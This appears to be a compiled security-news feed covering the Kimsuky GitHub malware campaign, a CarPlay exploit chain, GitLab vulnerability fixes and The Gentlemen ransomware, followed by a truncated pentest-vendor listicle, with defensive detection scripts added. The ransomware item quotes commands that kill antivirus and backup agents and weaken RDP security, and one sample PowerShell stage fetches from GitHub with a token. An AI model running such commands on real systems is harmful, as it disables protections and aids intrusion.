• The North Korea-backed APT group Kimsuky has escalated its cyber operations by weaponizing GitHub repositories for malware delivery and data exfiltration, marking a sophisticated evolution in their attack methodology.

    This latest campaign demonstrates the group’s growing expertise in abusing legitimate cloud infrastructure to evade traditional security measures while maintaining persistent access to compromised systems.

    The attack chain begins with a malicious ZIP archive containing an LNK file disguised as an electronic tax invoice (전자세금계산서.pdf.lnk).

    When executed, this weaponized shortcut launches a PowerShell command that downloads and executes additional malicious scripts from attacker-controlled GitHub repositories.

    The initial payload establishes a foundation for systematic data collection and maintains long-term persistence on infected systems.

    S2W researchers identified nine private GitHub repositories associated with this campaign, including group_0717, group_0721, test, hometax, and group_0803.

    The PowerShell scripts carry hardcoded GitHub personal access tokens to reach these private repositories. That is a convenience for the operators, but it also hands the same access to anyone who recovers a script, which is how the repositories' commit histories could be examined.

    Analysis of commit histories revealed the attacker’s email address (sahiwalsuzuki4[@]gmail.com) used during GitHub account creation.

    The persistence mechanism is conventional but effective: a scheduled task that keeps re-fetching the current stage from GitHub.

    Upon initial infection, the main.ps1 script creates a file named MicrosoftEdgeUpdate.ps1 under the %AppData% directory and establishes a scheduled task with the name “BitLocker MDM policy Refresh{DBHDFE12-496SDF-Q48D-SDEF-1865BCAD7E00}”.

    This task executes every 30 minutes after an initial 5-minute delay, creating an automated system for fetching and executing updated PowerShell scripts from the GitHub repository.

    Dynamic Script Management and Information Gathering

    The malware employs a dynamic script management system that timestamps infected systems and creates customized folders for data exfiltration.

    The PowerShell payload downloads a file named real.txt from the repository, replaces placeholder strings with timestamped values (ntxBill_{MMdd_HHmm}), and re-uploads the modified script using a time-specific filename format.

    This mechanism allows attackers to track individual infections and manage multiple compromised systems simultaneously.

    The information-stealing component collects comprehensive system metadata including IP addresses, boot times, operating system details, hardware specifications, device types, installation dates, and running processes.

    All collected data is compiled into log files and uploaded to the attacker’s repository under timestamped folders, creating an organized intelligence database for the threat actors.
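    The chain above (a GitHub token baked into a fetched PowerShell stage, and a scheduled task that re-pulls scripts from %AppData% every 30 minutes) leaves artefacts a defender can hunt for. The following is an added example, not S2W's or the article's code: it scans a PowerShell stage for GitHub tokens and fetch URLs, and scores an exported Task Scheduler XML for the traits reported here. The script text, the two task XML documents and the malformed-GUID heuristic are this example's own constructions.

```python
"""Hunt for the two traits described above: GitHub credentials baked into
PowerShell, and a scheduled task that re-fetches scripts from user-writable
storage on a short interval.

Added example; this is not S2W's or the article's code. The PowerShell
snippet and the Task Scheduler XML below are constructed for illustration.
"""
import re
import xml.etree.ElementTree as ET

# GitHub classic (ghp_) and fine-grained (github_pat_) token formats.
GITHUB_TOKEN_RE = re.compile(r"\b(?:ghp_[A-Za-z0-9]{36}|github_pat_[A-Za-z0-9_]{82})\b")
GITHUB_FETCH_RE = re.compile(r'https://(?:api\.github\.com|raw\.githubusercontent\.com)/[^\s"]+')
TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
HEX_GUID_RE = re.compile(r"[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}")


def find_github_abuse(script_text):
    """Return hardcoded tokens and GitHub fetch URLs found in a PowerShell script."""
    return {
        "tokens": GITHUB_TOKEN_RE.findall(script_text),
        "urls": GITHUB_FETCH_RE.findall(script_text),
    }


def suspicious_task(task_xml):
    """Score one exported scheduled task (the XML that schtasks /query /xml emits).

    Returns the list of reasons it resembles the persistence described in the
    article; an empty list means nothing matched.
    """
    root = ET.fromstring(task_xml)
    name = root.findtext("t:RegistrationInfo/t:URI", default="", namespaces=TASK_NS)
    interval = root.findtext(".//t:Repetition/t:Interval", default="", namespaces=TASK_NS)
    command = root.findtext(".//t:Exec/t:Command", default="", namespaces=TASK_NS)
    arguments = root.findtext(".//t:Exec/t:Arguments", default="", namespaces=TASK_NS)

    reasons = []
    if "powershell" in command.lower():
        reasons.append("action runs PowerShell")
    if re.search(r"%appdata%|\\appdata\\", arguments, re.IGNORECASE):
        reasons.append("script lives under AppData")
    minutes = re.fullmatch(r"PT(\d+)M", interval)
    if minutes and int(minutes.group(1)) <= 60:
        reasons.append(f"repeats every {minutes.group(1)} minutes")
    # Genuine Windows component tasks carry well-formed GUIDs; the task name the
    # article reports has a GUID-shaped suffix that is not valid hex (heuristic).
    guid = re.search(r"\{([^}]+)\}", name)
    if guid and not HEX_GUID_RE.fullmatch(guid.group(1)):
        reasons.append("task name carries a malformed GUID")
    return reasons


SAMPLE_SCRIPT = (  # constructed stand-in for a fetched stage; the token is a dummy
    '$token = "ghp_' + "A" * 36 + '"\n'
    '$headers = @{ Authorization = "token $token" }\n'
    'Invoke-RestMethod -Headers $headers -Uri '
    '"https://api.github.com/repos/example-org/group_0803/contents/real.txt"\n'
)

SAMPLE_TASK_XML = """<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <URI>\\BitLocker MDM policy Refresh{DBHDFE12-496SDF-Q48D-SDEF-1865BCAD7E00}</URI>
  </RegistrationInfo>
  <Triggers>
    <TimeTrigger>
      <Repetition><Interval>PT30M</Interval></Repetition>
      <StartBoundary>2025-08-03T10:05:00</StartBoundary>
    </TimeTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>powershell.exe</Command>
      <Arguments>-WindowStyle Hidden -ep Bypass -File %APPDATA%\\MicrosoftEdgeUpdate.ps1</Arguments>
    </Exec>
  </Actions>
</Task>"""

BENIGN_TASK_XML = """<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\\Microsoft\\Windows\\Defrag\\ScheduledDefrag</URI></RegistrationInfo>
  <Triggers><CalendarTrigger><ScheduleByWeek><WeeksInterval>1</WeeksInterval></ScheduleByWeek></CalendarTrigger></Triggers>
  <Actions Context="Author"><Exec><Command>%windir%\\system32\\defrag.exe</Command><Arguments>-c -h</Arguments></Exec></Actions>
</Task>"""

if __name__ == "__main__":
    print(find_github_abuse(SAMPLE_SCRIPT))
    print(suspicious_task(SAMPLE_TASK_XML))
    print(suspicious_task(BENIGN_TASK_XML))
```

    Run it against real exports (`schtasks /query /xml /tn <name>`) and against the .ps1 files under each user's AppData; the GUID check is a heuristic and should be treated as one signal among the others, not proof on its own.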


    The post Kimsuky Hackers Via Weaponized LNK File Abuses GitHub for Malware Delivery appeared first on Cyber Security News.


  • At the recent DefCon security conference, researchers demonstrated a critical exploit chain that allows attackers to gain root access on vehicle infotainment systems by targeting Apple CarPlay.

    The multi-stage attack, named “Pwn My Ride,” leverages a series of vulnerabilities in the protocols that underpin wireless CarPlay, culminating in remote code execution on the car’s multimedia unit.

    The core of the exploit is CVE-2025-24132, a stack buffer overflow vulnerability within the AirPlay protocol SDK. Researchers from Oligo Security presented how this flaw can be triggered once an attacker gains access to the vehicle’s Wi-Fi network.

    The vulnerability affects a wide range of devices that use AirPlay audio SDK versions before 2.7.1, AirPlay video SDK versions before 3.6.0.126, and specific versions of the CarPlay Communication Plug-in.

    By exploiting this buffer overflow, an attacker can execute arbitrary code with the highest level of system privileges, effectively taking control of the infotainment system.

    Exploiting the iAP2 Protocol

    The attack begins by targeting the initial connection process of wireless CarPlay. This process relies on two key protocols: iAP2 (iPod Accessory Protocol) over Bluetooth and AirPlay over Wi-Fi.

    The researchers discovered a fundamental authentication gap in iAP2. The protocol lets the phone authenticate the car, but it does not perform the reverse: the car never authenticates the phone.

    This one-way authentication allows an attacker’s device to impersonate a legitimate iPhone.

    The attacker can then pair with the vehicle’s Bluetooth, often without a PIN code due to many systems defaulting to the insecure “Just Works” pairing mode.

    Once paired, the attacker exploits the iAP2 flaw to send a RequestAccessoryWiFiConfigurationInformation command, which tricks the system into revealing the vehicle’s Wi-Fi SSID and password.

    After obtaining the Wi-Fi credentials, the attacker connects to the car’s network and triggers CVE-2025-24132 to gain root access.

    This entire sequence can be a zero-click attack on many vehicles, requiring no interaction from the driver.

    Although Apple shipped a patched AirPlay SDK in April 2025, Oligo Security said that, to its knowledge, no car manufacturer had applied the fix at the time of the talk.

    Unlike smartphones, which receive frequent over-the-air (OTA) updates, vehicle software update cycles are notoriously slow and fragmented.

    Many cars require a manual update at a dealership, and each automaker must independently test and validate the patched SDK for their specific hardware.

    This significant delay leaves millions of vehicles exposed to this vulnerability long after a fix has been made available, highlighting a critical gap in the automotive supply chain’s security posture.


    The post Apple CarPlay Exploited To Gain Root Access By Executing Remote Code appeared first on Cyber Security News.


  • GitLab has released critical security updates across multiple versions to address six significant vulnerabilities that could enable denial-of-service attacks, server-side request forgery, and information disclosure. The company released versions 18.3.2, 18.2.6, and 18.1.6 for both Community Edition and Enterprise Edition, with immediate upgrades strongly recommended for all self-managed installations. Critical Security Fixes Target Multiple Attack […]

    The post Multiple Vulnerabilities in GitLab Patched, Blocking DoS and SSRF Attack Vectors appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • Cybersecurity researchers have discovered two new malware families, including a modular Apple macOS backdoor called CHILLYHELL and a Go-based remote access trojan (RAT) named ZynorRAT that can target both Windows and Linux systems. According to an analysis from Jamf Threat Labs, ChillyHell is written in C++ and is developed for Intel architectures. CHILLYHELL is the name assigned to a malware


  • In recent months, security researchers have observed a surge in activity by a previously undocumented ransomware group known as The Gentlemen.

    This threat actor has rapidly distinguished itself through the deployment of highly specialized tools and meticulous reconnaissance tactics, targeting critical infrastructure across multiple sectors and regions.

    Leveraging legitimate Windows drivers and nuanced Group Policy Object (GPO) manipulation, The Gentlemen are capable of evading traditional defenses and achieving domain-wide compromise.

    The initial intrusion techniques of this group remain partially obscured; however, forensic evidence suggests that compromised credentials or exposed internet-facing services served as the primary infection vectors.

    Following foothold establishment, The Gentlemen deploy a dual-component defense evasion suite consisting of All.exe and ThrottleBlood.sys—a legitimate signed driver abused to terminate protected security processes.

    The Gentlemen ransomware group blog site (Source – Trend Micro)

    This kernel-level manipulation enables the threat actors to neutralize endpoint protections without triggering standard alerts.

    Trend Micro analysts noted that subsequent iterations of this suite include a dynamically modified binary, Allpatch2.exe, which specifically targets the unique security agent components present in the compromised network.

    By adapting their tools mid-campaign, the group has demonstrated both flexibility and a deep understanding of the enterprise security landscape.

    This approach has facilitated widespread deployment of their encryption payload via the NETLOGON share, ensuring rapid and comprehensive file encryption across domain-joined systems.

    The impact of The Gentlemen’s operations has been severe: key sectors such as manufacturing, healthcare, and construction have suffered service disruptions and extensive data encryption.

    Victims have reported loss of critical backups and unauthorized exfiltration of sensitive information via WinSCP, confirming the adoption of a double-extortion strategy.

    Victim distribution by industry, region, and country (as of August 2025) (Source – Trend Micro)

    A second figure depicts the full attack chain, from initial access through data exfiltration.

    Infection Mechanism and Kernel-Level Evasion

    A defining characteristic of The Gentlemen’s methodology is its exploitation of a legitimate Windows driver to achieve kernel-level execution.

    Upon execution, the ransomware drops a pair of files into the %USERPROFILE%\Downloads directory:

    copy All.exe %USERPROFILE%\Downloads\All.exe
    copy ThrottleBlood.sys %USERPROFILE%\Downloads\ThrottleBlood.sys

    The attacker then installs the driver and terminates targeted security and backup services; the command-line sequence illustrates this abuse of signed driver functionality:

    %USERPROFILE%\Downloads\All.exe install ThrottleBlood.sys
    taskkill /IM avagent.exe /F
    taskkill /IM VeeamNFSSvc.exe /F

    By leveraging this technique, The Gentlemen escape the limitations of user-mode bypasses.

    Once kernel execution is secured, the ransomware escalates privileges using PowerRun.exe, a legitimate utility frequently abused for elevated command execution.

    This allows the malware to modify critical registry keys, for example relaxing the RDP security layer with reg add HKLM\System\CurrentControlSet\Control\Terminal Server /v SecurityLayer /t REG_DWORD /d 1 /f (a value of 1 selects Negotiate rather than requiring TLS), and to deploy persistence mechanisms through GPO objects.
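    The sequence above (driver copied into Downloads, loaded through All.exe, taskkill against backup and AV agents, then RDP registry changes) can be correlated from endpoint telemetry. The following is an added example, not Trend Micro's code: it walks Sysmon-style events flattened to dicts and reports a host only when a kernel driver loaded from a user-writable path is followed, within a window, by those follow-on actions. The events, the target-process list, the path pattern and the 15-minute window are constructed assumptions.

```python
"""Correlate the driver-abuse chain described above from endpoint telemetry.

Added example, not Trend Micro's code. The events are constructed in Sysmon's
field vocabulary (EventID 6 DriverLoad, 1 ProcessCreate, 13 RegistryEvent)
flattened to dicts; the target-process list, the user-writable path pattern and
the 15-minute window are assumptions chosen for illustration.
"""
import re
from datetime import datetime, timedelta

# Kernel drivers have no business loading from a user profile directory,
# whether or not they carry a valid signature.
USER_WRITABLE = re.compile(
    r"^[A-Z]:\\Users\\[^\\]+\\(?:Downloads|AppData|Desktop|Documents)\\", re.I)
# Agents the article reports being killed, plus common security agent names (assumed list).
PROTECTED_TARGETS = {"avagent.exe", "veeamnfssvc.exe", "msmpeng.exe", "sentinelagent.exe"}
RDP_KEYS = re.compile(r"\\Control\\Terminal Server\\(?:SecurityLayer|UserAuthentication)$", re.I)
WINDOW = timedelta(minutes=15)


def correlate_byovd(events):
    """Return one finding per (host, driver) where a driver was loaded from a
    user-writable path and, within WINDOW, protected processes were killed or
    RDP hardening keys were rewritten. Hosts with neither follow-on are skipped.
    """
    by_host = {}
    for ev in sorted(events, key=lambda ev: ev["ts"]):  # ISO timestamps sort lexically
        by_host.setdefault(ev["host"], []).append(ev)

    findings = []
    for host, evs in by_host.items():
        loads = [ev for ev in evs if ev["event_id"] == 6 and USER_WRITABLE.search(ev["image"])]
        for load in loads:
            t0 = datetime.fromisoformat(load["ts"])
            killed, registry = [], []
            for ev in evs:
                t = datetime.fromisoformat(ev["ts"])
                if not (t0 <= t <= t0 + WINDOW):
                    continue
                if ev["event_id"] == 1 and ev["image"].lower().endswith("\\taskkill.exe"):
                    m = re.search(r"/IM\s+(\S+)", ev["command_line"], re.I)
                    if m and m.group(1).lower() in PROTECTED_TARGETS:
                        killed.append(m.group(1))
                elif ev["event_id"] == 13 and RDP_KEYS.search(ev["target_object"]):
                    registry.append(ev["target_object"].rsplit("\\", 1)[-1] + "=" + ev["details"])
            if killed or registry:
                findings.append({"host": host, "driver": load["image"],
                                 "killed": killed, "registry": registry})
    return findings


SAMPLE_EVENTS = [  # constructed telemetry, not real logs
    {"host": "FS01", "ts": "2025-08-12T02:14:05", "event_id": 1,
     "image": r"C:\Users\svc_backup\Downloads\All.exe",
     "command_line": r"C:\Users\svc_backup\Downloads\All.exe install ThrottleBlood.sys"},
    {"host": "FS01", "ts": "2025-08-12T02:14:06", "event_id": 6,
     "image": r"C:\Users\svc_backup\Downloads\ThrottleBlood.sys", "signed": "true"},
    {"host": "FS01", "ts": "2025-08-12T02:14:09", "event_id": 1,
     "image": r"C:\Windows\System32\taskkill.exe", "command_line": "taskkill /IM avagent.exe /F"},
    {"host": "FS01", "ts": "2025-08-12T02:14:10", "event_id": 1,
     "image": r"C:\Windows\System32\taskkill.exe", "command_line": "taskkill /IM VeeamNFSSvc.exe /F"},
    {"host": "FS01", "ts": "2025-08-12T02:20:41", "event_id": 13,
     "target_object": r"HKLM\System\CurrentControlSet\Control\Terminal Server\SecurityLayer",
     "details": "DWORD (0x00000001)"},
    # A normal host: a system driver load and an unrelated taskkill, which must not fire.
    {"host": "WS07", "ts": "2025-08-12T02:15:00", "event_id": 6,
     "image": r"C:\Windows\System32\drivers\tcpip.sys", "signed": "true"},
    {"host": "WS07", "ts": "2025-08-12T02:15:30", "event_id": 1,
     "image": r"C:\Windows\System32\taskkill.exe", "command_line": "taskkill /IM notepad.exe /F"},
]

if __name__ == "__main__":
    for finding in correlate_byovd(SAMPLE_EVENTS):
        print(finding)
```

    The signature field is deliberately ignored: the page's point is that the driver is legitimately signed, so "Signed=true" is not a reason to suppress the alert. What matters is where the driver loaded from and what happened next.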

    The Gentlemen ransomware attack chain (Source – Trend Micro)

    The attack-chain figure shows the code-driven stages of driver-based process termination. The combination of legitimate tools with custom binaries exemplifies a mature adversary who balances stealth, adaptability, and impact.

    As organizations struggle with conventional endpoint defenses, the emergence of such advanced tactics underscores the urgent need for proactive threat hunting and implementation of Zero Trust principles.


    The post New Gentlemen Ransomware Leverages Legitimate Drivers, Group Policies to Infiltrate Organizations appeared first on Cyber Security News.


  • Fileless malware has become a formidable adversary for security teams, operating entirely in memory and evading disk-based detection. A recent incident demonstrates how attackers leveraged a multi-stage fileless loader to deploy AsyncRAT, a powerful Remote Access Trojan (RAT), through legitimate system tools—leaving almost no footprint on disk. This case study highlights critical techniques for persistence, […]

    The post AsyncRAT Leverages Fileless Techniques to Bypass Detection appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • GitLab has released urgent security patches for its Community (CE) and Enterprise (EE) editions, addressing multiple vulnerabilities, including two high-severity flaws that could lead to Server-Side Request Forgery (SSRF) and Denial of Service (DoS) attacks.

    The company is strongly advising all administrators of self-managed GitLab installations to upgrade immediately to the newly released versions: 18.3.2, 18.2.6, and 18.1.6.

    The updates address a total of six security vulnerabilities, ranging in severity. Customers using the cloud-hosted GitLab.com service are already protected, and GitLab Dedicated users do not need to take any action.

    The fixes are part of GitLab’s scheduled patch releases, which aim to resolve security issues and bugs promptly.

    High-Severity Flaws Patched

    The most critical vulnerabilities fixed in this release are a high-severity SSRF flaw and a high-severity DoS issue.

    The SSRF vulnerability, tracked as CVE-2025-6454, holds a CVSS score of 8.5. It existed in the Webhook custom header feature and could be exploited by an authenticated user.

    By injecting specially crafted sequences, an attacker could force the GitLab instance to make unintended internal requests within proxy environments, potentially leading to further compromise.

    This flaw affects all versions from 16.11 before 18.1.6, 18.2 before 18.2.6, and 18.3 before 18.3.2. The second high-severity issue, CVE-2025-2256, is a DoS vulnerability with a CVSS score of 7.5.

    An unauthenticated attacker could have exploited this flaw by sending multiple concurrent, large SAML responses to a GitLab instance, overwhelming its resources and rendering it unresponsive to legitimate users.

    This vulnerability has a wide impact, affecting all versions from 7.12 before 18.1.6, 18.2 before 18.2.6, and 18.3 before 18.3.2.

    Medium-Severity Vulnerabilities Addressed

    Alongside the high-severity issues, GitLab patched four medium-severity vulnerabilities, three of which could also result in a denial of service.

    • CVE-2025-1250: A DoS flaw (CVSS 6.5) where an authenticated user could stall background job processing by using specially crafted commit messages or merge request descriptions.
    • CVE-2025-7337: A persistent DoS vulnerability (CVSS 6.5) that allowed an authenticated user with at least Developer-level access to crash a GitLab instance by uploading large files.
    • CVE-2025-10094: Another DoS issue (CVSS 6.5) enabling authenticated users to disrupt access to token-related operations by creating tokens with excessively long names.
    • CVE-2025-6769: An information disclosure vulnerability (CVSS 4.3) that could have allowed an authenticated user to view administrator-only maintenance notes by accessing runner details through specific interfaces.
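    Both this advisory and the CarPlay write-up earlier on this page come down to the same operational question: which deployed builds fall inside an affected range. The following is an added example, not code from GitLab, Oligo Security or Apple. It transcribes the ranges the page states (AirPlay audio SDK fixed in 2.7.1, AirPlay video SDK fixed in 3.6.0.126, CVE-2025-6454 from 16.11 and CVE-2025-2256 from 7.12 with fixes in 18.1.6, 18.2.6 and 18.3.2) and triages a constructed inventory against them; the CarPlay Communication Plug-in versions are not given on the page and so are not modelled.

```python
"""Affected-version triage for the ranges quoted on this page.

Added example; not code from GitLab, Oligo Security or Apple. The ranges are
transcribed from the page text and the inventory is constructed.
"""


def vtuple(version):
    """'3.6.0.126' -> (3, 6, 0, 126). Compare numerically, never as strings:
    '2.10.0' < '2.7.1' lexically, which would mark a fixed build as vulnerable."""
    return tuple(int(part) for part in version.split("."))


def is_affected(version, ranges):
    """ranges: (introduced, fixed) pairs; introduced=None means every earlier release."""
    v = vtuple(version)
    for introduced, fixed in ranges:
        low = vtuple(introduced) if introduced else ()
        if low <= v < vtuple(fixed):
            return True
    return False


# Only the 18.1 / 18.2 / 18.3 lines received fixes, so older lines must jump series.
GITLAB_FIXED_LINES = [("18.2.0", "18.2.6"), ("18.3.0", "18.3.2")]
RULES = {
    "AirPlay audio SDK": {"CVE-2025-24132": [(None, "2.7.1")]},
    "AirPlay video SDK": {"CVE-2025-24132": [(None, "3.6.0.126")]},
    "GitLab": {
        "CVE-2025-6454": [("16.11", "18.1.6")] + GITLAB_FIXED_LINES,
        "CVE-2025-2256": [("7.12", "18.1.6")] + GITLAB_FIXED_LINES,
    },
}

INVENTORY = [  # constructed assets
    {"asset": "head-unit-A", "component": "AirPlay audio SDK", "version": "2.6.9"},
    {"asset": "head-unit-B", "component": "AirPlay audio SDK", "version": "2.10.0"},
    {"asset": "head-unit-B", "component": "AirPlay video SDK", "version": "3.6.0.125"},
    {"asset": "gitlab-prod", "component": "GitLab", "version": "18.2.5"},
    {"asset": "gitlab-dev", "component": "GitLab", "version": "18.3.2"},
    {"asset": "gitlab-legacy", "component": "GitLab", "version": "15.11.13"},
]


def triage(inventory, rules=RULES):
    """Return (asset, cve) pairs for every inventory row inside an affected range."""
    hits = []
    for row in inventory:
        for cve, ranges in rules.get(row["component"], {}).items():
            if is_affected(row["version"], ranges):
                hits.append((row["asset"], cve))
    return hits


if __name__ == "__main__":
    for asset, cve in triage(INVENTORY):
        print(f"{asset}: {cve}")
```

    Two rows are there to make a point: head-unit-B's audio SDK 2.10.0 is safe only if versions are compared numerically, and gitlab-legacy on 15.11 is affected by the SAML DoS but has no patched release in its own series, so the remediation is an upgrade across majors, not a point release.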

    GitLab has credited several security researchers, yuki_osaki, ppee, pwnie, and iamgk808, for discovering and reporting these vulnerabilities through its HackerOne bug bounty program.

    In line with its disclosure policy, the full details of these vulnerabilities will be made public on GitLab’s issue tracker 30 days after the release.

    The company has urged all self-managed customers to review the security announcement and apply the updates to protect their instances from potential attacks.


    The post GitLab Patches Multiple Vulnerabilities That Enables Denial Of Service and SSRF Attacks appeared first on Cyber Security News.


  • A high-quality mobile application penetration testing company is essential for businesses that want to safeguard their digital assets and user data.

    These specialized firms employ ethical hackers who simulate real-world cyberattacks to identify and exploit vulnerabilities within mobile apps.

    The insights from these tests enable developers to fix security flaws before they can be leveraged by malicious actors, thereby preventing data breaches, reputational damage, and financial loss.

    Choosing a top mobile app pentesting company requires a careful evaluation of their expertise, methodology, and reputation.

    The best firms don’t just use automated tools; they combine them with deep, manual analysis to uncover complex, business-logic vulnerabilities that scanners often miss.

    Their reports are not only comprehensive but also provide clear, actionable remediation steps, empowering development teams to build more secure applications.

    With the mobile threat landscape constantly evolving, partnering with a leading mobile application penetration testing firm is a proactive and strategic investment for any business committed to security.

    How We Chose These Best Mobile Application Penetration Testing Companies

    To identify the best mobile application penetration testing companies, we focused on several key criteria that align with Google’s E-A-T (Expertise, Authoritativeness, Trustworthiness) guidelines and critical SEO signals. Our selection process was guided by the following factors:

    • Expertise and Methodology: We looked for companies with a proven track record of deep, specialized knowledge in mobile security. This includes expertise in both iOS and Android platforms, as well as a robust methodology that combines automated scanning with thorough manual testing and reverse engineering.
    • Customer Reviews and Reputation: We evaluated customer feedback and industry recognition from platforms like Gartner Peer Insights and other reputable sources. Companies with high customer satisfaction and positive peer reviews were prioritized.
    • Comprehensive Service Offerings: The top firms don’t just offer penetration testing; they provide a full suite of services, including static and dynamic analysis, API security testing, and compliance reporting (e.g., OWASP Mobile Top 10, GDPR).
    • Actionable Reporting: A key differentiator is the quality of the final report. We selected companies that provide clear, detailed, and actionable reports with risk prioritization and specific remediation guidance for developers.
    • Integration and Scalability: We considered firms that offer flexible solutions that can integrate seamlessly into a company’s existing DevSecOps pipeline, allowing for continuous security testing.

    Comparison Table: Top 10 Best Mobile Application Penetration Testing Companies in 2025

    Company           | Automated Scanning | Manual Pentesting | Cloud-Based Service | DevSecOps Integration | Compliance Reporting
    ------------------|--------------------|-------------------|---------------------|-----------------------|---------------------
    Veracode          | Yes                | Yes               | Yes                 | Yes                   | Yes
    White Knight Labs | No                 | Yes               | Yes                 | Yes                   | Yes
    Appknox           | Yes                | Yes               | Yes                 | Yes                   | Yes
    Pradeo            | Yes                | No                | Yes                 | No                    | Yes
    Cyserch           | Yes                | Yes               | No                  | No                    | Yes
    Software Secured  | No                 | Yes               | No                  | Yes                   | No
    NowSecure         | Yes                | Yes               | Yes                 | Yes                   | Yes
    Microminder CS    | Yes                | Yes               | Yes                 | Yes                   | Yes
    Checkmarx         | Yes                | No                | Yes                 | Yes                   | Yes
    Acunetix          | Yes                | No                | Yes                 | Yes                   | Yes

    1. Veracode


    Specifications:

    Veracode offers a full-lifecycle application security platform that includes penetration testing as a service (PTaaS).

    It combines expert-led manual testing with automated SAST, DAST, and SCA to find a wide range of vulnerabilities, including business logic flaws and nuanced issues that automated tools may miss.

    Their approach is designed to be hassle-free and can be scheduled to meet recurring compliance needs.

    Reason to Buy:

    Best for enterprises seeking a complete, integrated application security platform that blends expert manual testing with powerful automation.

    Features:

    • Penetration Testing as a Service
    • Centralized platform for all security testing
    • PCI-DSS, HIPAA, GDPR compliance support
    • AI-powered remediation guidance
    • Flexible, predictable pricing models

    Pros:

    • Comprehensive platform
    • Strong compliance focus
    • Automated and manual testing blend
    • Actionable, prioritized results

    Cons:

    • Can be expensive for smaller teams
    • Steep learning curve for full platform usage
    • Some users report complex integrations
    • Not a pure-play pentesting firm

    ✅ Best For: Large enterprises and organizations that require a holistic, ongoing AppSec program with robust compliance and reporting capabilities.

    Official Website: Veracode

    2. White Knight Labs


    Specifications:

    White Knight Labs provides premier mobile application penetration testing with a focus on both iOS and Android platforms.

    Their methodology is comprehensive, simulating multiple attack vectors including insecure storage, stolen device scenarios, and API exploitation.

    The team has extensive experience in reverse engineering and tailors assessments to address platform-specific security risks.

    Reason to Buy:

    Ideal for organizations that need a highly specialized, hands-on, and expert-led manual penetration test for their mobile applications.

    Features:

    • iOS and Android-specific expertise
    • Comprehensive methodology
    • Source code review and reverse engineering
    • In-depth API security testing
    • Detailed reports with remediation guidance

    Pros:

    • Highly experienced team
    • Tailored, manual approach
    • Deep technical analysis
    • Excellent reporting and consultation

    Cons:

    • Primarily focused on manual testing
    • May not be suitable for teams needing automated CI/CD integration
    • Less emphasis on automated scanning
    • Pricing can vary based on project scope

    ✅ Best For: Companies that need an in-depth, hands-on security assessment from a highly specialized team of experts.

    Official Website: White Knight Labs

    3. Appknox


    Specifications:

    Appknox is a mobile-first security platform that delivers a suite of solutions including automated and manual vulnerability assessments.

    Recognized by Gartner for its focus on 2025 AppSec trends, it’s designed to be CI/CD-ready and AI-powered, making it easy for developers to integrate security into their workflow.

    The platform is especially strong in compliance, helping businesses meet standards like OWASP Mobile Top 10 and GDPR.

    Reason to Buy:

    A user-friendly, developer-centric platform that simplifies mobile application security testing and compliance for teams of all sizes.

    Features:

    • AI-powered and CI/CD ready
    • Manual vulnerability assessment
    • Streamlined compliance management
    • Detailed, user-friendly reports
    • Integrates with Jira and other dev tools

    Pros:

    • Easy to use and set up
    • Mobile-first focus
    • Strong compliance features
    • AI-augmented remediation

    Cons:

    • Less known for general web application security
    • Manual testing is an add-on
    • May have a smaller team of manual testers
    • Focus is more on platform than pure service

    ✅ Best For: Development teams and startups that need a fast, user-friendly, and compliance-focused mobile security platform.

    Official Website: Appknox

    4. Pradeo


    Specifications:

    Pradeo is a mobile security company that leverages AI-based technology to deliver robust mobile application security testing (MAST).

    Their primary focus is on automated, deep analysis of mobile apps to detect vulnerabilities and data leakage, providing a 360-degree view of an application’s security posture.

    Their solution is particularly effective at scanning binary files, making it a valuable tool for examining off-the-shelf applications.

    Reason to Buy:

    An AI-driven solution that offers rapid and comprehensive automated analysis of mobile apps, even without access to source code.

    Features:

    • AI-based security testing
    • Fast analysis of binary files
    • Data leakage prevention
    • Mobile Threat Defense (MTD)
    • Integration with enterprise mobility management (EMM)

    Pros:

    • Highly automated and fast
    • Excellent for third-party app analysis
    • Focus on mobile-specific threats
    • Clear, comprehensive reporting

    Cons:

    • Lacks a manual penetration testing service
    • May not uncover complex business logic flaws
    • Primarily a tool-based approach
    • Less suitable for deeply custom tests

    ✅ Best For: Businesses that need a powerful, automated solution for quick, continuous security assessments of both internally developed and third-party apps.

    Official Website: Pradeo

    5. Cyserch


    Specifications:

    Cyserch is a cybersecurity firm offering comprehensive mobile application penetration testing services. They utilize a blend of OWASP methodology and a hybrid approach to create tailored test cases for each application’s unique business logic.

    Their process includes static and dynamic analysis, reverse engineering, and in-depth testing of data storage and authentication mechanisms, delivering detailed and actionable reports.

    Reason to Buy:

    A trusted partner for customized, end-to-end security evaluations with a strong emphasis on detailed, developer-friendly reporting.

    Features:

    • OWASP methodology
    • Hybrid testing approach
    • Static and dynamic analysis
    • In-depth data storage testing
    • Comprehensive vulnerability reports

    Pros:

    • Tailored testing methodology
    • Focus on business logic
    • High-quality, detailed reports
    • Cost-effective solutions

    Cons:

    • Less integrated into modern CI/CD pipelines
    • May not offer the same scale as larger firms
    • Lacks some of the automated features of platform-based competitors
    • Primarily a service provider

    ✅ Best For: Companies that require a bespoke, detailed security assessment and a clear, developer-friendly report from a dedicated team.

    Official Website: Cyserch

    6. Software Secured


    Specifications:

    Software Secured specializes in human-led security services, providing an Application Penetration Testing as a Service (PTaaS) model.

    Their methodology emphasizes manual testing and a consultative approach to find business logic vulnerabilities.

    They integrate with client teams to provide expert guidance and ensure that remediation efforts are effective. While they have a platform, their core strength lies in their expert-driven service model.

    Reason to Buy:

    For organizations that prioritize a consultative, human-led approach over a purely automated solution, focusing on business logic and custom-built applications.

    Features:

    • Human-led security testing
    • PTaaS model
    • Expert-driven services
    • Seamless team integration
    • Proactive and continuous security

    Pros:

    • Deep expertise in manual testing
    • Highly consultative approach
    • Uncovers complex business logic flaws
    • Strong focus on remediation

    Cons:

    • Not a fully automated solution
    • Not ideal for teams needing high-volume, continuous scanning
    • No automated reports and compliance checks
    • Services are project-based

    ✅ Best For: Businesses with complex, custom-built applications that require a hands-on, expert-led security partner.

    Official Website: Software Secured

    7. NowSecure


    Specifications:

